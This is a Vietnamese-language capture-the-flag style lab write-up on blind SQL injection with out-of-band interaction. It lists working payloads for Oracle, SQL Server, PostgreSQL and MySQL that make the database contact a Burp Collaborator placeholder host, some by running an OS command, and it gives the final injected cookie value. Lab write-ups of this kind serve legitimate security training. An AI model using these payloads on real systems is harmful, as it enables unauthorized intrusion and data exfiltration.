Lab: Blind SQL injection with out-of-band interaction
Last updated
Last updated
Ứng dụng sử dụng cookie theo dõi để phân tích và thực hiện truy vấn SQL có chứa giá trị của cookie đã gửi.
Truy vấn SQL được thực hiện không đồng bộ và không ảnh hưởng đến phản hồi của ứng dụng. Tuy nhiên, bạn có thể kích hoạt các tương tác ngoài băng tần với miền bên ngoài.
Mục tiêu: Khai thác lỗ hổng tiêm SQL để thực hiện tra cứu DNS tới Burp Collaborator.
Có thể khiến cơ sở dữ liệu thực hiện tra cứu DNS đến một miền bên ngoài sử dụng để tạo một miền phụ Burp Collaborator duy nhất mà sẽ sử dụng trong cuộc tấn công của mình, sau đó thăm dò máy chủ Collaborator để xác nhận rằng đã xảy ra tra cứu DNS.
Oracle
() lỗ hổng kích hoạt tra cứu DNS. Lỗ hổng đã được vá nhưng vẫn còn nhiều cài đặt Oracle chưa được vá:
SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://BURP-COLLABORATOR-SUBDOMAIN/"> %remote;]>'),'/l') FROM dual
Kỹ thuật sau đây hoạt động trên các cài đặt Oracle đã vá đầy đủ, nhưng yêu cầu quyền cao hơn:
SELECT UTL_INADDR.get_host_address('BURP-COLLABORATOR-SUBDOMAIN')
Microsoft
exec master..xp_dirtree '//BURP-COLLABORATOR-SUBDOMAIN/a'
PostgreSQL
copy (SELECT '') to program 'nslookup BURP-COLLABORATOR-SUBDOMAIN'
MySQL
Các kỹ thuật sau đây chỉ hoạt động trên Windows
LOAD_FILE('\\\\BURP-COLLABORATOR-SUBDOMAIN\\a')
SELECT ... INTO OUTFILE '\\\\BURP-COLLABORATOR-SUBDOMAIN\a'
';SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://BURP-COLLABORATOR-SUBDOMAIN/"> %remote;]>'),'/l') FROM dual--